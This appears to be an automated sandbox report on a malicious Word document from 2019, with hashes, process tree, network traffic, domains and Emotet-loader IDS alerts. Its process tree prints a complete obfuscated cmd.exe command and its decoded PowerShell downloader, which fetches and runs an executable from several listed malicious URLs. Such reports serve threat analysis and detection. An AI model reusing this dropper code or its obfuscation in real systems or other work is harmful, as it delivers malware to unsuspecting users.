File name: | Malware_MSOLE2_08a8469304bdab9e7d748e4a2e748d6f047c2bca26bd0d7d56f3e5d051313f58 |
Full analysis: | https://app.any.run/tasks/94aa603f-f668-44c2-b981-16e4f14e0d0e |
Verdict: | Malicious activity |
Analysis date: | January 18, 2019, 08:55:06 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Jan 16 06:12:00 2019, Last Saved Time/Date: Wed Jan 16 06:12:00 2019, Number of Pages: 1, Number of Words: 2, Number of Characters: 14, Security: 0 |
MD5: | C9AC3811CEE43CC6ED16AB0F250AA7FC |
SHA1: | 9E9B71774C22453541FDE9F51D92EFB9F299CA9C |
SHA256: | 08A8469304BDAB9E7D748E4A2E748D6F047C2BCA26BD0D7D56F3E5D051313F58 |
SSDEEP: | 1536:Zocn1kp59gxBK85fBx6GmB0xgc2tJ+a9:u41k/W48/tS0x |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:01:16 06:12:00 |
ModifyDate: | 2019:01:16 06:12:00 |
Pages: | 1 |
Words: | 2 |
Characters: | 14 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 15 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: | |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2956 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Malware_MSOLE2_08a8469304bdab9e7d748e4a2e748d6f047c2bca26bd0d7d56f3e5d051313f58.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3964 | "C:\Windows\system32\cmd.exe" /c %PRoGRamDATa:~0,1%%pRogRAMdATA:~9,2% /V /r " sEt hfz=pow^%PU[2)C:~5,6^%ul^%SESS)ONN?ME:~`4,6^%h^%$EMP:~`3,6^%]] -S?SulgJu2'RegJnionii';-digita]diu2new`object Net.WebC]ient;-[ulandidu2'http://www.agJtomatizatgJpyme.com/De]4?8f@http://pos.ulgJmen8.com/wp`content/cache/GVV9yia7@http://tuliet]ongtangoc.info/m6[RgJY5QJj@http://theulyangulogJp.so]gJtions/6U5ulfD7X@http://ongeLeeulgulatis.n]/9LjJU[V'.Sp]it('@'_;-oulangepmu2'KidsJewe]eulyzul';-guleenda u2 '908';-#oulizonta]hulu2'1ulozenkt';-?)]wu2-enL:pgJb]ic+'\'+-guleenda+'.exe';fouleach(-De]awauleip in -[ulandid_{tuly{-digita]di.Down]oad1i]e(-De]awauleip, -?)]w_;-wiule]esshnu2'fgJnctiona]itiessgJ';)f ((Get`)tem -?)]w_.]ength `ge 80000_ {)nLoke`)tem -?)]w;-ShoesJewe]eulydzu2'Shoesab';buleak;}}catch{}}-?GPwmu2'bandwidthLa';& SeT 3jZA=!hfz:u2==!& seT Y7b=!3jZA:ul=r!& set Bm2=!Y7b:gJ=u!&& SET XNQI=!Bm2:[=B!&& set R1=!XNQI:L=v!& set USf=!R1:$=T!& SET mD=!USf:1=F!&sET 9Zc=!mD:?=A!&& seT Vm=!9Zc:2=L!&& SET HwL=!Vm:)=I!&& sEt hY=!HwL:]=l!& Set Dv=!hY:_=)!& SET UJC=!Dv:6=1!& SET BXk=!UJC:#=H!& SEt Wyzv=!BXk:-=$!&& sEt 2H=!Wyzv:`=-!&&ecHO %2H% |cMD.EXE" | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2504 | CmD /V /r " sEt hfz=pow^%PU[2)C:~5,6^%ul^%SESS)ONN?ME:~`4,6^%h^%$EMP:~`3,6^%]] -S?SulgJu2'RegJnionii';-digita]diu2new`object Net.WebC]ient;-[ulandidu2'http://www.agJtomatizatgJpyme.com/De]4?8f@http://pos.ulgJmen8.com/wp`content/cache/GVV9yia7@http://tuliet]ongtangoc.info/m6[RgJY5QJj@http://theulyangulogJp.so]gJtions/6U5ulfD7X@http://ongeLeeulgulatis.n]/9LjJU[V'.Sp]it('@'_;-oulangepmu2'KidsJewe]eulyzul';-guleenda u2 '908';-#oulizonta]hulu2'1ulozenkt';-?)]wu2-enL:pgJb]ic+'\'+-guleenda+'.exe';fouleach(-De]awauleip in -[ulandid_{tuly{-digita]di.Down]oad1i]e(-De]awauleip, -?)]w_;-wiule]esshnu2'fgJnctiona]itiessgJ';)f ((Get`)tem -?)]w_.]ength `ge 80000_ {)nLoke`)tem -?)]w;-ShoesJewe]eulydzu2'Shoesab';buleak;}}catch{}}-?GPwmu2'bandwidthLa';& SeT 3jZA=!hfz:u2==!& seT Y7b=!3jZA:ul=r!& set Bm2=!Y7b:gJ=u!&& SET XNQI=!Bm2:[=B!&& set R1=!XNQI:L=v!& set USf=!R1:$=T!& SET mD=!USf:1=F!&sET 9Zc=!mD:?=A!&& seT Vm=!9Zc:2=L!&& SET HwL=!Vm:)=I!&& sEt hY=!HwL:]=l!& Set Dv=!hY:_=)!& SET UJC=!Dv:6=1!& SET BXk=!UJC:#=H!& SEt Wyzv=!BXk:-=$!&& sEt 2H=!Wyzv:`=-!&&ecHO %2H% |cMD.EXE" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2756 | C:\Windows\system32\cmd.exe /S /D /c" ecHO %2H% " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2876 | cMD.EXE | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3364 | powershell $SASru='Reunionii';$digitaldi=new-object Net.WebClient;$Brandid='http://www.automatizatupyme.com/Del4A8f@http://pos.rumen8.com/wp-content/cache/GVV9yia7@http://trietlongtangoc.info/m1BRuY5QJj@http://theryangroup.solutions/1U5rfD7X@http://ongeveergratis.nl/9vjJUBV'.Split('@');$orangepm='KidsJeweleryzr';$greenda = '908';$Horizontalhr='Frozenkt';$AIlw=$env:public+'\'+$greenda+'.exe';foreach($Delawareip in $Brandid){try{$digitaldi.DownloadFile($Delawareip, $AIlw);$wirelesshn='functionalitiessu';If ((Get-Item $AIlw).length -ge 80000) {Invoke-Item $AIlw;$ShoesJewelerydz='Shoesab';break;}}catch{}}$AGPwm='bandwidthva'; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
PID | Process | Filename | Type | |
---|---|---|---|---|
2956 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR893B.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2956 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\34BA0790.wmf | — | |
MD5:— | SHA256:— | |||
2956 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4120241E.wmf | — | |
MD5:— | SHA256:— | |||
3364 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2CT5QN6GS88RJ007UNWD.temp | — | |
MD5:— | SHA256:— | |||
3364 | powershell.exe | C:\Users\Public\908.exe | — | |
MD5:— | SHA256:— | |||
2956 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:64C61735DBC64018968099CFAD655851 | SHA256:B122C1B8060B8C869A016EE692F1F3D6A5A468CC6D8D6B8507FDC6BFB8DAAE75 | |||
2956 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8985C251.wmf | wmf | |
MD5:B0C3799CAD076A1E8AF9C0A6A76046B8 | SHA256:93D5346C76BC24E74810492A95DA38929FEAC4DF25A5CD2D9C03D62AB5EFA123 | |||
3364 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF199e98.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
3364 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2956 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:9E45D8F2E35DE364503F53066FEBD232 | SHA256:CEF5E6B27CC27FACF73BE04D8E25ED6B68DF30EE3F659B7EEC22B879A1A8F1E1 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3364 | powershell.exe | GET | 301 | 45.124.86.88:80 | http://trietlongtangoc.info/m1BRuY5QJj | VN | html | 247 b | malicious |
3364 | powershell.exe | GET | 403 | 45.124.86.88:80 | http://trietlongtangoc.info/m1BRuY5QJj/ | VN | html | 487 b | malicious |
3364 | powershell.exe | GET | 200 | 97.79.236.65:80 | http://www.automatizatupyme.com/cgi-sys/suspendedpage.cgi | US | html | 7.42 Kb | malicious |
3364 | powershell.exe | GET | 302 | 97.79.236.65:80 | http://www.automatizatupyme.com/Del4A8f | US | html | 241 b | malicious |
3364 | powershell.exe | GET | 404 | 91.134.143.44:80 | http://theryangroup.solutions/1U5rfD7X | FR | html | 294 b | malicious |
3364 | powershell.exe | GET | 404 | 185.104.29.44:80 | http://ongeveergratis.nl/9vjJUBV | NL | html | 324 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3364 | powershell.exe | 45.124.86.88:80 | trietlongtangoc.info | VNPT Corp | VN | malicious |
3364 | powershell.exe | 185.104.29.44:80 | ongeveergratis.nl | Stichting DIGI NL | NL | malicious |
3364 | powershell.exe | 97.79.236.65:80 | www.automatizatupyme.com | Global Virtual Opportunities | US | malicious |
3364 | powershell.exe | 91.134.143.44:80 | theryangroup.solutions | OVH SAS | FR | malicious |
Domain | IP | Reputation |
---|---|---|
www.automatizatupyme.com | | malicious |
pos.rumen8.com | | suspicious |
trietlongtangoc.info | | malicious |
theryangroup.solutions | | malicious |
ongeveergratis.nl | | malicious |
PID | Process | Class | Message |
---|---|---|---|
3364 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3364 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3364 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious redirect to 'suspendedpage.cgi' |
3364 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3364 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3364 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3364 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3364 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3364 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |